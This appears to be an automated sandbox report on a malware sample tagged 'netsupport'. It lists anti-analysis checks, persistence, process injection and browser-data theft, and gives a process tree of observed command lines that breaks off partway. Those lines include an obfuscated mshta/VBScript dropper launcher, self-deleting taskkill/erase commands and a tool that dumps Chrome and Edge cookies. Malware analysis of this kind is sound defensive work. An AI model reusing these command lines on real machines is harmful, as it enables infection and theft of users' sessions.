netsupport | 1cd649ea4273fd977b6a350bfe8f3b62f1d0aee1408b9966aa3d6ad39ba5af6a

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	PegYFqmYOCQQpBeo47YBAEF5.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	TjiAcqevqaAuG8f2vw40KD72.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	TjiAcqevqaAuG8f2vw40KD72.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	gd6uGJvHfRYMrGagBQn0wl2K.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	gd6uGJvHfRYMrGagBQn0wl2K.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	RAGsMRiGvQfHKGxdA_XdEHZ4.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	RAGsMRiGvQfHKGxdA_XdEHZ4.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	PegYFqmYOCQQpBeo47YBAEF5.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation	Setup (5).exe

Loads dropped DLL 3 IoCs

pid	Process
3784	3IjmjaZKIJmptGbbtw1_D26A.exe
4432	Eug40X9J7YAE5ZHuGHmAbQnS.tmp
4432	Eug40X9J7YAE5ZHuGHmAbQnS.tmp

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Themida packer 12 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral27/files/0x000100000001abc5-158.dat	themida
behavioral27/files/0x000100000001aba4-180.dat	themida
behavioral27/files/0x000100000001aba2-212.dat	themida
behavioral27/files/0x000100000001aba5-206.dat	themida
behavioral27/files/0x000100000001abc5-199.dat	themida
behavioral27/files/0x000100000001aba4-198.dat	themida
behavioral27/files/0x000100000001aba2-182.dat	themida
behavioral27/files/0x000100000001aba5-179.dat	themida
behavioral27/memory/1368-254-0x0000000001200000-0x0000000001201000-memory.dmp	themida
behavioral27/memory/2008-269-0x00000000009D0000-0x00000000009D1000-memory.dmp	themida
behavioral27/memory/3000-264-0x0000000000860000-0x0000000000861000-memory.dmp	themida
behavioral27/memory/1452-246-0x0000000000050000-0x0000000000051000-memory.dmp	themida

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe"	1076433.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 4 IoCs

evasion trojan

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	TjiAcqevqaAuG8f2vw40KD72.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	gd6uGJvHfRYMrGagBQn0wl2K.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	RAGsMRiGvQfHKGxdA_XdEHZ4.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	PegYFqmYOCQQpBeo47YBAEF5.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 23 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
244	api.db-ip.com
387	ip-api.com
598	freegeoip.app
37	api.db-ip.com
209	ipinfo.io
215	freegeoip.app
216	freegeoip.app
221	ipinfo.io
419	ipinfo.io
422	ipinfo.io
597	freegeoip.app
32	ipinfo.io
36	api.db-ip.com
139	ip-api.com
213	freegeoip.app
574	geoiptool.com
33	ipinfo.io
149	ipinfo.io
200	ipinfo.io
236	ipinfo.io
237	ipinfo.io
241	freegeoip.app
147	ipinfo.io

Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

pid	Process
1368	TjiAcqevqaAuG8f2vw40KD72.exe
1452	gd6uGJvHfRYMrGagBQn0wl2K.exe
2008	PegYFqmYOCQQpBeo47YBAEF5.exe
3000	RAGsMRiGvQfHKGxdA_XdEHZ4.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 3488 set thread context of 4716	3488	DBquM9Ux3O2P6QTSM7bEyIJg.exe	115
PID 3972 set thread context of 4920	3972	xuPTrPhG8LiTCCYkRU3l5dJn.exe	119
PID 196 set thread context of 4224	196	jfiag3g_gg.exe	136

Drops file in Program Files directory 18 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe	Setup.exe
File opened for modification	C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe	Setup.exe
File opened for modification	C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe	Setup.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\customer3.exe	RP11pnadhhUPl610oidJj8MQ.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe	RP11pnadhhUPl610oidJj8MQ.exe
File opened for modification	C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe	Setup.exe
File opened for modification	C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe	Setup.exe
File opened for modification	C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe	Setup.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\jooyu.exe	RP11pnadhhUPl610oidJj8MQ.exe
File created	C:\Program Files (x86)\Company\NewProduct\Uninstall.ini	RP11pnadhhUPl610oidJj8MQ.exe
File opened for modification	C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe	Setup.exe
File opened for modification	C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe	Setup.exe
File opened for modification	C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe	Setup.exe
File opened for modification	C:\Program Files (x86)\GameBox INC\GameBox\Uninstall.exe	Setup.exe
File created	C:\Program Files (x86)\GameBox INC\GameBox\Uninstall.ini	Setup.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\Uninstall.exe	RP11pnadhhUPl610oidJj8MQ.exe
File opened for modification	C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe	Setup.exe
File opened for modification	C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe	Setup.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 35 IoCs

pid	pid_target	Process	procid_target
932	688	WerFault.exe	91
4852	688	WerFault.exe	91
2240	688	WerFault.exe	91
5488	2280	WerFault.exe	98
6012	688	WerFault.exe	91
2732	4108	WerFault.exe	111
5840	4108	WerFault.exe	111
4168	2220	WerFault.exe	112
1092	4108	WerFault.exe	111
5528	2220	WerFault.exe	112
5172	2220	WerFault.exe	112
4768	4108	WerFault.exe	111
5316	4108	WerFault.exe	111
2240	688	WerFault.exe	91
2196	2220	WerFault.exe	112
4396	4108	WerFault.exe	111
2968	4108	WerFault.exe	111
5372	2220	WerFault.exe	112
6692	4228	WerFault.exe	143
6748	2220	WerFault.exe	112
7116	4228	WerFault.exe	143
6556	4228	WerFault.exe	143
6452	2220	WerFault.exe	112
4312	4108	WerFault.exe	111
6732	4228	WerFault.exe	143
6916	4108	WerFault.exe	111
6184	4228	WerFault.exe	143
6192	4108	WerFault.exe	111
3780	4228	WerFault.exe	143
6632	4228	WerFault.exe	143
5952	4228	WerFault.exe	143
2176	4228	WerFault.exe	143
5536	4228	WerFault.exe	143
7588	4108	WerFault.exe	111
4768	4228	WerFault.exe	143

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	tdLynNSjWDwoYV_NtVV9prtL.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	tdLynNSjWDwoYV_NtVV9prtL.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	tdLynNSjWDwoYV_NtVV9prtL.exe

Creates scheduled task(s) 1 TTPs 4 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

pid	Process
8712	schtasks.exe
4044	schtasks.exe
2564	schtasks.exe
10984	schtasks.exe

Interacts with shadow copies 2 TTPs 2 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
6488	vssadmin.exe
10860	vssadmin.exe

Kills process with taskkill 8 IoCs

evasion

pid	Process
9500	taskkill.exe
10196	taskkill.exe
5392	taskkill.exe
5620	taskkill.exe
5844	taskkill.exe
8336	taskkill.exe
5808	taskkill.exe
8056	taskkill.exe

Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery

T1018

pid	Process
6048	PING.EXE
9172	PING.EXE

Script User-Agent 11 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	163	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	219	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	149	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	155	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	171	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	206	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	227	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	420	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	426	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	148	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	165	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 43 IoCs

pid	Process
500	Setup (5).exe
500	Setup (5).exe
932	WerFault.exe
932	WerFault.exe
932	WerFault.exe
932	WerFault.exe
932	WerFault.exe
932	WerFault.exe
932	WerFault.exe
932	WerFault.exe
932	WerFault.exe
932	WerFault.exe
932	WerFault.exe
932	WerFault.exe
932	WerFault.exe
932	WerFault.exe
932	WerFault.exe
932	WerFault.exe
932	WerFault.exe
932	WerFault.exe
932	WerFault.exe
4852	WerFault.exe
4852	WerFault.exe
4852	WerFault.exe
4852	WerFault.exe
4852	WerFault.exe
4852	WerFault.exe
4852	WerFault.exe
4852	WerFault.exe
4852	WerFault.exe
4852	WerFault.exe
4852	WerFault.exe
4852	WerFault.exe
4852	WerFault.exe
4852	WerFault.exe
4852	WerFault.exe
4852	WerFault.exe
4852	WerFault.exe
4852	WerFault.exe
4852	WerFault.exe
4852	WerFault.exe
4224	tdLynNSjWDwoYV_NtVV9prtL.exe
4224	tdLynNSjWDwoYV_NtVV9prtL.exe

Suspicious use of AdjustPrivilegeToken 15 IoCs

description	pid	Process
Token: SeDebugPrivilege	3784	3IjmjaZKIJmptGbbtw1_D26A.exe
Token: SeDebugPrivilege	2436	hqhJ93v2Sp2le8a1_PJ6h24Z.exe
Token: SeDebugPrivilege	1132	Process not Found
Token: SeRestorePrivilege	932	WerFault.exe
Token: SeBackupPrivilege	932	WerFault.exe
Token: SeDebugPrivilege	932	WerFault.exe
Token: SeDebugPrivilege	4716	DBquM9Ux3O2P6QTSM7bEyIJg.exe
Token: SeDebugPrivilege	1452	gd6uGJvHfRYMrGagBQn0wl2K.exe
Token: SeDebugPrivilege	1764	0ZvtfMMtmei_r2LUhzD6s3nl.exe
Token: SeDebugPrivilege	4852	WerFault.exe
Token: SeDebugPrivilege	1368	TjiAcqevqaAuG8f2vw40KD72.exe
Token: SeDebugPrivilege	3000	RAGsMRiGvQfHKGxdA_XdEHZ4.exe
Token: SeDebugPrivilege	2008	PegYFqmYOCQQpBeo47YBAEF5.exe
Token: SeDebugPrivilege	4920	xuPTrPhG8LiTCCYkRU3l5dJn.exe
Token: SeDebugPrivilege	208	1407570.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
4432	Eug40X9J7YAE5ZHuGHmAbQnS.tmp

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 500 wrote to memory of 3792	500	Setup (5).exe	81
PID 500 wrote to memory of 3792	500	Setup (5).exe	81
PID 500 wrote to memory of 3792	500	Setup (5).exe	81
PID 500 wrote to memory of 3776	500	Setup (5).exe	82
PID 500 wrote to memory of 3776	500	Setup (5).exe	82
PID 500 wrote to memory of 3784	500	Setup (5).exe	80
PID 500 wrote to memory of 3784	500	Setup (5).exe	80
PID 500 wrote to memory of 1132	500	Setup (5).exe	83
PID 500 wrote to memory of 1132	500	Setup (5).exe	83
PID 500 wrote to memory of 2436	500	Setup (5).exe	79
PID 500 wrote to memory of 2436	500	Setup (5).exe	79
PID 500 wrote to memory of 2436	500	Setup (5).exe	79
PID 500 wrote to memory of 2068	500	Setup (5).exe	86
PID 500 wrote to memory of 2068	500	Setup (5).exe	86
PID 500 wrote to memory of 2068	500	Setup (5).exe	86
PID 500 wrote to memory of 2448	500	Setup (5).exe	85
PID 500 wrote to memory of 2448	500	Setup (5).exe	85
PID 500 wrote to memory of 2448	500	Setup (5).exe	85
PID 500 wrote to memory of 1960	500	Setup (5).exe	84
PID 500 wrote to memory of 1960	500	Setup (5).exe	84
PID 500 wrote to memory of 1960	500	Setup (5).exe	84
PID 500 wrote to memory of 688	500	Setup (5).exe	91
PID 500 wrote to memory of 688	500	Setup (5).exe	91
PID 500 wrote to memory of 688	500	Setup (5).exe	91
PID 500 wrote to memory of 196	500	Setup (5).exe	89
PID 500 wrote to memory of 196	500	Setup (5).exe	89
PID 500 wrote to memory of 196	500	Setup (5).exe	89
PID 500 wrote to memory of 3972	500	Setup (5).exe	88
PID 500 wrote to memory of 3972	500	Setup (5).exe	88
PID 500 wrote to memory of 3972	500	Setup (5).exe	88
PID 500 wrote to memory of 3932	500	Setup (5).exe	87
PID 500 wrote to memory of 3932	500	Setup (5).exe	87
PID 500 wrote to memory of 3932	500	Setup (5).exe	87
PID 500 wrote to memory of 3464	500	Setup (5).exe	94
PID 500 wrote to memory of 3464	500	Setup (5).exe	94
PID 500 wrote to memory of 3464	500	Setup (5).exe	94
PID 500 wrote to memory of 1452	500	Setup (5).exe	95
PID 500 wrote to memory of 1452	500	Setup (5).exe	95
PID 500 wrote to memory of 1452	500	Setup (5).exe	95
PID 500 wrote to memory of 3488	500	Setup (5).exe	93
PID 500 wrote to memory of 3488	500	Setup (5).exe	93
PID 500 wrote to memory of 3488	500	Setup (5).exe	93
PID 500 wrote to memory of 2776	500	Setup (5).exe	102
PID 500 wrote to memory of 2776	500	Setup (5).exe	102
PID 500 wrote to memory of 2776	500	Setup (5).exe	102
PID 500 wrote to memory of 1764	500	Setup (5).exe	100
PID 500 wrote to memory of 1764	500	Setup (5).exe	100
PID 500 wrote to memory of 1764	500	Setup (5).exe	100
PID 500 wrote to memory of 2280	500	Setup (5).exe	98
PID 500 wrote to memory of 2280	500	Setup (5).exe	98
PID 500 wrote to memory of 2280	500	Setup (5).exe	98
PID 500 wrote to memory of 3000	500	Setup (5).exe	105
PID 500 wrote to memory of 3000	500	Setup (5).exe	105
PID 500 wrote to memory of 3000	500	Setup (5).exe	105
PID 500 wrote to memory of 1368	500	Setup (5).exe	104
PID 500 wrote to memory of 1368	500	Setup (5).exe	104
PID 500 wrote to memory of 1368	500	Setup (5).exe	104
PID 500 wrote to memory of 2008	500	Setup (5).exe	109
PID 500 wrote to memory of 2008	500	Setup (5).exe	109
PID 500 wrote to memory of 2008	500	Setup (5).exe	109
PID 500 wrote to memory of 2192	500	Setup (5).exe	108
PID 500 wrote to memory of 2192	500	Setup (5).exe	108
PID 500 wrote to memory of 2192	500	Setup (5).exe	108
PID 500 wrote to memory of 2220	500	Setup (5).exe	112

C:\Users\Admin\AppData\Local\Temp\Setup (5).exe
"C:\Users\Admin\AppData\Local\Temp\Setup (5).exe"
1⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:500
- C:\Users\Admin\Documents\hqhJ93v2Sp2le8a1_PJ6h24Z.exe
  "C:\Users\Admin\Documents\hqhJ93v2Sp2le8a1_PJ6h24Z.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2436
- - C:\Users\Admin\Documents\hqhJ93v2Sp2le8a1_PJ6h24Z.exe
    "C:\Users\Admin\Documents\hqhJ93v2Sp2le8a1_PJ6h24Z.exe"
    3⤵
    PID:5172
- C:\Users\Admin\Documents\3IjmjaZKIJmptGbbtw1_D26A.exe
  "C:\Users\Admin\Documents\3IjmjaZKIJmptGbbtw1_D26A.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of AdjustPrivilegeToken
  PID:3784
- C:\Users\Admin\Documents\Dz6v9cEoKfJYRw032bIvHe6r.exe
  "C:\Users\Admin\Documents\Dz6v9cEoKfJYRw032bIvHe6r.exe"
  2⤵
  - Executes dropped EXE
  PID:3792
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c taskkill /im "Dz6v9cEoKfJYRw032bIvHe6r.exe" /f & erase "C:\Users\Admin\Documents\Dz6v9cEoKfJYRw032bIvHe6r.exe" & exit
    3⤵
    PID:4960
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /im "Dz6v9cEoKfJYRw032bIvHe6r.exe" /f
      4⤵
      Kills process with taskkill
      PID:5620
- C:\Users\Admin\Documents\gjBZerm3X6OG0IODIHvioyga.exe
  "C:\Users\Admin\Documents\gjBZerm3X6OG0IODIHvioyga.exe"
  2⤵
  - Executes dropped EXE
  PID:3776
- C:\Users\Admin\Documents\KxuucbJ_95kucQ9ETFrE7iPJ.exe
  "C:\Users\Admin\Documents\KxuucbJ_95kucQ9ETFrE7iPJ.exe"
  2⤵
  - Executes dropped EXE
  PID:1132
- - C:\Users\Admin\AppData\Roaming\1407570.exe
    "C:\Users\Admin\AppData\Roaming\1407570.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:208
- - C:\Users\Admin\AppData\Roaming\1076433.exe
    "C:\Users\Admin\AppData\Roaming\1076433.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    PID:4588
  - - C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
      "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
      4⤵
      PID:5800
- - C:\Users\Admin\AppData\Roaming\3196400.exe
    "C:\Users\Admin\AppData\Roaming\3196400.exe"
    3⤵
    - Executes dropped EXE
    PID:4536
- - C:\Users\Admin\AppData\Roaming\3309763.exe
    "C:\Users\Admin\AppData\Roaming\3309763.exe"
    3⤵
    - Executes dropped EXE
    PID:3476
- C:\Users\Admin\Documents\AOrVfqejFU4lQIMMYFfynLWS.exe
  "C:\Users\Admin\Documents\AOrVfqejFU4lQIMMYFfynLWS.exe"
  2⤵
  - Executes dropped EXE
  PID:1960
- - C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\System32\mshta.exe" vbSCRipt:ClOSe( creATEoBJEcT("WscRIpT.sHEll" ).RUN("Cmd /Q /C tYPe ""C:\Users\Admin\Documents\AOrVfqejFU4lQIMMYFfynLWS.exe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if """" == """" for %W iN ( ""C:\Users\Admin\Documents\AOrVfqejFU4lQIMMYFfynLWS.exe"" ) do taskkill -IM ""%~nXW"" -f " ,0 ,TRUE ) )
    3⤵
    PID:4840
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\Documents\AOrVfqejFU4lQIMMYFfynLWS.exe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if ""=="" for %W iN ( "C:\Users\Admin\Documents\AOrVfqejFU4lQIMMYFfynLWS.exe") do taskkill -IM "%~nXW" -f
      4⤵
      PID:4740
    - - C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe
        
        WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9
        5⤵
        Executes dropped EXE
        
        PID:2164
      - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbSCRipt:ClOSe( creATEoBJEcT("WscRIpT.sHEll" ).RUN("Cmd /Q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if ""-PifOcLbay~PF~N8a_e9RyKpu9 "" == """" for %W iN ( ""C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe"" ) do taskkill -IM ""%~nXW"" -f " ,0 ,TRUE ) )
        6⤵
        
        PID:5312
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if "-PifOcLbay~PF~N8a_e9RyKpu9 "=="" for %W iN ( "C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe") do taskkill -IM "%~nXW" -f
        7⤵
        
        PID:5548
      - C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" ~IWm4Wh.I,nKhkoYTFE
        6⤵
        
        PID:5232
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill -IM "AOrVfqejFU4lQIMMYFfynLWS.exe" -f
        5⤵
        Kills process with taskkill
        
        PID:5392
- C:\Users\Admin\Documents\XeZ3UVKJj0F8nD1ajWBiOWIQ.exe
  "C:\Users\Admin\Documents\XeZ3UVKJj0F8nD1ajWBiOWIQ.exe"
  2⤵
  - Executes dropped EXE
  PID:2448
- C:\Users\Admin\Documents\ch4sEc_fJpwjttkGs9QqTu4a.exe
  "C:\Users\Admin\Documents\ch4sEc_fJpwjttkGs9QqTu4a.exe"
  2⤵
  - Executes dropped EXE
  PID:2068
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\2191432438.exe"
    3⤵
    PID:5788
  - - C:\Users\Admin\AppData\Local\Temp\2191432438.exe
      "C:\Users\Admin\AppData\Local\Temp\2191432438.exe"
      4⤵
      PID:5828
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\5822333286.exe"
    3⤵
    PID:7768
  - - C:\Users\Admin\AppData\Local\Temp\5822333286.exe
      "C:\Users\Admin\AppData\Local\Temp\5822333286.exe"
      4⤵
      PID:4160
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c taskkill /im "ch4sEc_fJpwjttkGs9QqTu4a.exe" /f & erase "C:\Users\Admin\Documents\ch4sEc_fJpwjttkGs9QqTu4a.exe" & exit
    3⤵
    PID:2424
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /im "ch4sEc_fJpwjttkGs9QqTu4a.exe" /f
      4⤵
      Kills process with taskkill
      PID:5844
- C:\Users\Admin\Documents\RP11pnadhhUPl610oidJj8MQ.exe
  "C:\Users\Admin\Documents\RP11pnadhhUPl610oidJj8MQ.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  PID:3932
- - C:\Program Files (x86)\Company\NewProduct\jooyu.exe
    "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
    3⤵
    - Executes dropped EXE
    PID:4880
  - - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      4⤵
      Suspicious use of SetThreadContext
      PID:196
  - - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      4⤵
      PID:6956
  - - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      4⤵
      PID:6396
  - - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      4⤵
      PID:7520
- - C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
    "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
    3⤵
    - Executes dropped EXE
    PID:4812
- - C:\Program Files (x86)\Company\NewProduct\customer3.exe
    "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
    3⤵
    - Executes dropped EXE
    PID:4772
  - - C:\Users\Admin\AppData\Local\Temp\11111.exe
      C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      4⤵
      PID:5404
  - - C:\Users\Admin\AppData\Local\Temp\11111.exe
      C:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"
      4⤵
      PID:4468
  - - C:\Users\Admin\AppData\Local\Temp\11111.exe
      C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      4⤵
      PID:4960
  - - C:\Users\Admin\AppData\Local\Temp\11111.exe
      C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"
      4⤵
      PID:6024
  - - C:\Users\Admin\AppData\Local\Temp\22222.exe
      C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      4⤵
      PID:1048
  - - C:\Users\Admin\AppData\Local\Temp\22222.exe
      C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
      4⤵
      PID:5372
  - - C:\Users\Admin\AppData\Local\Temp\22222.exe
      C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      4⤵
      PID:6284
  - - C:\Users\Admin\AppData\Local\Temp\22222.exe
      C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
      4⤵
      PID:6448
- C:\Users\Admin\Documents\xuPTrPhG8LiTCCYkRU3l5dJn.exe
  "C:\Users\Admin\Documents\xuPTrPhG8LiTCCYkRU3l5dJn.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:3972
- - C:\Users\Admin\Documents\xuPTrPhG8LiTCCYkRU3l5dJn.exe
    C:\Users\Admin\Documents\xuPTrPhG8LiTCCYkRU3l5dJn.exe
    3⤵
    - Executes dropped EXE
    PID:4656
- - C:\Users\Admin\Documents\xuPTrPhG8LiTCCYkRU3l5dJn.exe
    C:\Users\Admin\Documents\xuPTrPhG8LiTCCYkRU3l5dJn.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:4920
- C:\Users\Admin\Documents\tdLynNSjWDwoYV_NtVV9prtL.exe
